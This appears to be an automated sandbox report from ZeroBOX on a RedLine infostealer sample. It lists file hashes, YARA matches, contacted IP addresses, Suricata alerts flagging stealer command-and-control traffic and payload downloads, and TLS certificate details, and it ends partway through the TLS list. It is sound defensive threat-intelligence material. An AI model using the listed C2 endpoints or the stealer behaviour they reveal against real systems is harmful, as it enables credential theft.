Summary | ZeroBOX

WWW14_64.exe

Tags: RedLine Infostealer, RedLine stealer, Eredel Stealer Extended, Generic Malware, Confuser .NET, .NET framework(MSIL), VMProtect, Malicious Packer, UPX, Malicious Library, SMTP, PWS, AntiDebug, PE64, PE File, DLL, OS Processor Check, PE32, AntiVM
Category: FILE | Machine: s1_win7_x6403_us | Started: Sept. 14, 2023, 7:14 p.m. | Completed: Sept. 14, 2023, 7:23 p.m.
Size 7.5MB
Type PE32+ executable (GUI) x86-64, for MS Windows
MD5 24fbc8705072bb32a6ac2fc995a66f17
SHA256 69ded352d815114251f0986f1f9d16702f1b33372c23fe8de2cd18ddab231e13
CRC32 342D657F
ssdeep 196608:1/26U9PTHjFEewj925ecIj3uauDXdeRCpParPWNZPfOvjqOe:1u6AzpE/4QnuDde05ge3PWvjI
Yara
  • UPX_Zero - UPX packed file
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE64 - (no description)
  • VMProtect_Zero - VMProtect packed file

IP Address Status Action
104.21.95.210 Active Moloch
104.26.8.59 Active Moloch
148.251.234.93 Active Moloch
156.236.72.121 Active Moloch
164.124.101.2 Active Moloch
172.67.197.101 Active Moloch
172.67.200.102 Active Moloch
172.67.214.144 Active Moloch
176.123.9.85 Active Moloch
178.63.45.64 Active Moloch
182.162.106.32 Active Moloch
185.225.73.32 Active Moloch
185.225.74.51 Active Moloch
193.42.32.118 Active Moloch
34.117.59.81 Active Moloch
45.15.156.229 Active Moloch
45.9.74.80 Active Moloch
87.240.129.133 Active Moloch
87.240.132.78 Active Moloch
87.240.137.134 Active Moloch
87.240.137.140 Active Moloch
94.156.35.76 Active Moloch
95.142.206.0 Active Moloch
95.142.206.1 Active Moloch
95.142.206.3 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49167 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49165 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49169 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 172.67.197.101:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49163 -> 193.42.32.118:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49171 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 172.67.197.101:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 172.67.197.101:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 172.67.197.101:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 172.67.214.144:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 172.67.214.144:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49189 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49189 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 172.67.200.102:80 -> 192.168.56.103:49177 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 172.67.197.101:80 -> 192.168.56.103:49178 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49181 -> 172.67.214.144:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 172.67.197.101:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49184 -> 172.67.214.144:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 104.26.8.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49164 -> 104.26.8.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:64178 -> 164.124.101.2:53 2016778 ET DNS Query to a *.pw domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 172.67.214.144:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 172.67.214.144:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49190 -> 104.21.95.210:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49191 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49191 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49193 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49193 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49200 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49200 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49197 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49197 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49194 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49198 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49205 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49203 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49203 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49204 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49204 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49202 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49202 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49215 -> 87.240.137.134:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49209 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49192 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49174 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 87.240.132.78:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49212 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49220 -> 95.142.206.1:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49218 -> 95.142.206.0:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49217 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49221 -> 95.142.206.3:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49230 -> 45.15.156.229:80 2045779 ET MALWARE Win32/BeamWinHTTP CnC Activity M2 (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49246 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49249 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49260 -> 176.123.9.85:16482 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.103:49260 -> 176.123.9.85:16482 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.103:49260 -> 176.123.9.85:16482 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 192.168.56.103:49260 -> 176.123.9.85:16482 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 148.251.234.93:443 -> 192.168.56.103:49259 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 176.123.9.85:16482 -> 192.168.56.103:49260 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 192.168.56.103:49266 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49232 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49240 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49241 -> 185.225.73.32:44973 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.103:49270 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49270 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49241 -> 185.225.73.32:44973 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 192.168.56.103:49241 -> 185.225.73.32:44973 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 192.168.56.103:49241 -> 185.225.73.32:44973 2046105 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Outbound) A Network Trojan was detected
TCP 192.168.56.103:49276 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49250 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49277 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49280 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49269 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49282 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043233 ET INFO Microsoft net.tcp Connection Initialization Activity Potentially Bad Traffic
TCP 192.168.56.103:49274 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49274 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49287 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2046045 ET MALWARE [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) A Network Trojan was detected
TCP 156.236.72.121:443 -> 192.168.56.103:49288 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 185.225.74.51:44767 -> 192.168.56.103:49242 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response A Network Trojan was detected
TCP 192.168.56.103:49286 -> 87.240.129.133:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49257 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 148.251.234.93:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49296 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49285 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 185.225.74.51:44767 -> 192.168.56.103:49242 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 192.168.56.103:49302 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49242 -> 185.225.74.51:44767 2043231 ET MALWARE Redline Stealer TCP CnC Activity A Network Trojan was detected
TCP 192.168.56.103:49309 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49309 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49313 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49315 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49313 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 87.240.129.133:80 -> 192.168.56.103:49315 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49323 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.103:52004 -> 164.124.101.2:53 2023883 ET DNS Query to a *.top domain - Likely Hostile Potentially Bad Traffic
TCP 192.168.56.103:49318 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49325 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49316 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49324 -> 94.156.35.76:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 192.168.56.103:49326 -> 87.240.129.133:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49324 -> 94.156.35.76:80 2023882 ET INFO HTTP Request to a *.top domain Potentially Bad Traffic
TCP 192.168.56.103:49319 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49324 -> 94.156.35.76:80 2022896 ET HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer June 13 2016 A Network Trojan was detected
TCP 156.236.72.121:443 -> 192.168.56.103:49332 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49195 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49338 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49348 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 87.240.132.78:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49342 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 87.240.132.78:80 -> 192.168.56.103:49201 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49344 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 87.240.132.78:80 -> 192.168.56.103:49206 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49216 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49213 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49219 -> 87.240.132.78:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49229 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49243 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49337 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49340 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49262 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49334 -> 87.240.129.133:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49271 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49272 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49281 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49278 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 156.236.72.121:443 -> 192.168.56.103:49292 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49295 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49305 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49311 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49320 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49327 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49329 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49341 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49336 -> 87.240.137.140:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49233 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49234 -> 104.26.8.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49234 -> 104.26.8.59:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49234 -> 104.26.8.59:443 2042969 ET INFO Observed External IP Lookup Domain in TLS SNI (api .myip .com) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49245 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49245 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49255 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49263 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49265 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49291 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49294 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49298 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49299 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49304 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49310 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49308 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 156.236.72.121:443 -> 192.168.56.103:49312 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49307 -> 87.240.129.133:80 2260000 SURICATA Applayer Mismatch protocol both directions Generic Protocol Command Decode
TCP 192.168.56.103:49307 -> 87.240.129.133:80 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49308 -> 45.9.74.80:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49317 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49345 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49346 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49237 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49261 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49267 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49275 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49290 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 156.236.72.121:443 -> 192.168.56.103:49300 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49330 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49335 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.225.73.32:44973 -> 192.168.56.103:49241 2046056 ET MALWARE Redline Stealer Activity (Response) A Network Trojan was detected
TCP 185.225.73.32:44973 -> 192.168.56.103:49241 2046106 ET MALWARE Redline Stealer TCP CnC Activity - MSValue (Response) A Network Trojan was detected
TCP 192.168.56.103:49165 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49349 -> 156.236.72.121:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49245 -> 34.117.59.81:443 2025331 ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io) Device Retrieving External IP Address Detected

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49171
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49186
172.67.197.101:443
C=US, O=Let's Encrypt, CN=E1 CN=preconcert.pw 60:b2:a3:3e:2f:80:57:cd:6f:c1:a3:e9:b3:c6:cb:95:41:83:4a:64
TLSv1
192.168.56.103:49184
172.67.214.144:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=sergejbukotko.com f1:9c:9e:67:d8:1b:22:61:4a:4d:a0:fc:b3:45:84:76:9e:9d:2d:27
TLSv1
192.168.56.103:49164
104.26.8.59:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com 92:b4:ed:98:67:d9:db:8a:1e:bd:0e:fe:7f:22:45:e9:79:b5:78:65
TLSv1
192.168.56.103:49190
104.21.95.210:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=verypayment.net bb:8c:d6:7d:de:34:56:31:72:a3:92:eb:2e:e0:8f:ce:79:20:e6:b2
TLSv1
192.168.56.103:49205
87.240.132.78:443
C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09
TLSv1
192.168.56.103:49215
